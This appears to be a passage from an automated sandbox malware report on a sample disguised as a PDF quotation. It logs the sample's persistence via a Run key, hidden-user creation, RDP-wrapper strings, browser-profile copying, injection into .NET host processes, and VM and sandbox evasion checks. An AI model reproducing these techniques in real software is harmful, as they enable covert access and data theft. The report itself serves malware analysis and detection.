                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004174D1 push ebp; retf 33_2_00417584
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00417570 push ebp; retf 33_2_00417584
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,33_2_004060B0
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.941086335962951

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,33_2_0040D2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\donexx.exe
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeFile created: C:\Users\user\AppData\Roaming\Fhzejfh.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040290E URLDownloadToFileW,ShellExecuteW,33_2_0040290E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,33_2_0040A36F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,33_2_00409E2D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,33_2_00413695
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Fhzejfh
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0040D3A8

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | delete
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: aspnet_compiler.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\System32\dllhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6844 Thread sleep count: 43 > 30
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6844 Thread sleep time: -43000s >= -30000s
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6860 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep count: 33 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -30437127721620741s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1096 Thread sleep count: 7594 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599884s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1096 Thread sleep count: 2001 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599765s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599652s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599537s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599399s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599283s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599167s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -599049s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598920s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598681s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598560s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598455s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598339s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598224s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -598092s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597976s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597854s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597738s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597606s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597490s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597352s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597236s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597121s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -597004s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596873s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596751s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596635s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596519s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596388s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596285s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596156s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -596046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595937s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595828s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595718s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595609s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595499s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595390s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595276s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595156s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -595046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594936s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594828s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594718s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594608s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594499s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594390s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594280s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436 Thread sleep time: -594171s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4804 Thread sleep count: 44 > 30
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4804 Thread sleep time: -44000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4472 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4996 Thread sleep count: 70 > 30
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,33_2_0040D8FB
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599537Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599399Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599283Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599167Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598920Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598681Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598339Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598224Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597976Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597854Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597738Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597606Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597490Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597236Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597121Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597004Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596873Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596751Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596635Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596519Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596285Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595276Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594171Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 7594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 2001Jump to behavior
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,33_2_0041154A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_33-11318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_33-14072
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xxxxxxxxt|VMWare|Virtualk=b24=stemd""sion\Run\
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.000000000260A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xxxxxxxxt|VMWare|Virtualk=b24=stemd""sion\Run\`,`q
                  Source: AppLaunch.exe, 00000018.00000002.473407695.000000000A000000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471764044.0000000001546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
